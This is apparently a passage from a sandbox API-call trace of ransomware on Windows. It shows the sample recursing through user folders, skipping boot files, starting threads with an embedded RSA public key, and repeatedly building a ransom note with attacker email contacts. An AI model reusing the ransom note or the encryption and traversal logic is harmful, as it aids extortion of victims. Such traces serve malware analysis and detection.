(in: lpString1=0x17cf1c, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0206.440] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e0 [0206.441] Sleep (dwMilliseconds=0x96) [0206.596] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0206.596] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0206.597] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0206.597] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0206.597] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*" [0206.597] SetErrorMode (uMode=0x1) returned 0x1 [0206.597] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT") returned 44 [0206.597] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.597] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.597] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x8fc) returned 0x0 [0206.597] RegQueryValueExW (in: hKey=0x8fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bb480, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43bb480*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.597] RegCloseKey (hKey=0x8fc) returned 0x0 [0206.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.598] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.598] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.598] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.600] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.600] PathFindFileNameW (pszPath="C:\\Users\\Default\\Links") returned="Links" [0206.600] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0206.601] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.601] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.601] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0206.601] SetErrorMode (uMode=0x1) returned 0x1 [0206.601] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0206.601] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0206.601] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Local Settings\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0206.601] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*" [0206.601] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.601] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.601] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0206.601] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*" [0206.601] SetErrorMode (uMode=0x1) returned 0x1 [0206.601] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 53 [0206.601] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.602] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.602] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x958) returned 0x0 [0206.602] RegQueryValueExW (in: hKey=0x958, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bb6b0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43bb6b0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.602] RegCloseKey (hKey=0x958) returned 0x0 [0206.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.602] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.602] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.603] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.604] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.604] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.604] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.604] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0206.604] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0206.604] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.605] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.605] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0206.605] SetErrorMode (uMode=0x1) returned 0x1 [0206.605] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0206.605] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0206.605] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0206.605] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*" [0206.605] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.605] PathFindFileNameW (pszPath="C:\\Users\\Default\\Music") returned="Music" [0206.605] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0206.605] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0206.605] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0206.605] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0206.605] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0206.605] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0206.605] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\") returned 27 [0206.605] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Music\\") [0206.605] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.605] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.605] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\") returned="\\\\?\\C:\\Users\\Default\\Music\\" [0206.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b8 [0206.606] Sleep (dwMilliseconds=0x96) [0206.752] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0206.752] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0206.752] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0206.752] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0206.752] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*" [0206.752] SetErrorMode (uMode=0x1) returned 0x1 [0206.752] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT") returned 44 [0206.752] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.753] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.753] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x8ac) returned 0x0 [0206.753] RegQueryValueExW (in: hKey=0x8ac, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bb8e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43bb8e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.753] RegCloseKey (hKey=0x8ac) returned 0x0 [0206.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.753] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.753] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.753] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.753] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0206.753] PathFindFileNameW (pszPath="C:\\Users\\Default\\Music") returned="Music" [0206.753] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0206.753] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.753] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.753] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0206.753] SetErrorMode (uMode=0x1) returned 0x1 [0206.753] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0206.753] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0206.753] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\My Documents\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0206.753] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*" [0206.753] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.754] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.754] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0206.754] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*" [0206.754] SetErrorMode (uMode=0x1) returned 0x1 [0206.754] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT") returned 51 [0206.754] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.754] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.754] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x8a8) returned 0x0 [0206.754] RegQueryValueExW (in: hKey=0x8a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bbb10, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43bbb10*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.754] RegCloseKey (hKey=0x8a8) returned 0x0 [0206.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.754] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0206.754] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0206.755] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.756] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.756] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.756] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0206.756] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0206.756] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0206.756] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0206.756] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0206.756] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0206.756] SetErrorMode (uMode=0x1) returned 0x1 [0206.756] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0206.756] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0206.756] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\NetHood\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0206.756] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*" [0206.756] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0206.756] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0206.757] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0206.757] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*" [0206.757] SetErrorMode (uMode=0x1) returned 0x1 [0206.757] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT") returned 46 [0206.757] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0206.757] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0206.757] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x8a8) returned 0x0 [0206.757] RegQueryValueExW (in: hKey=0x8a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437ff78, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x437ff78*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0206.757] RegCloseKey (hKey=0x8a8) returned 0x0 [0206.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0206.757] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was 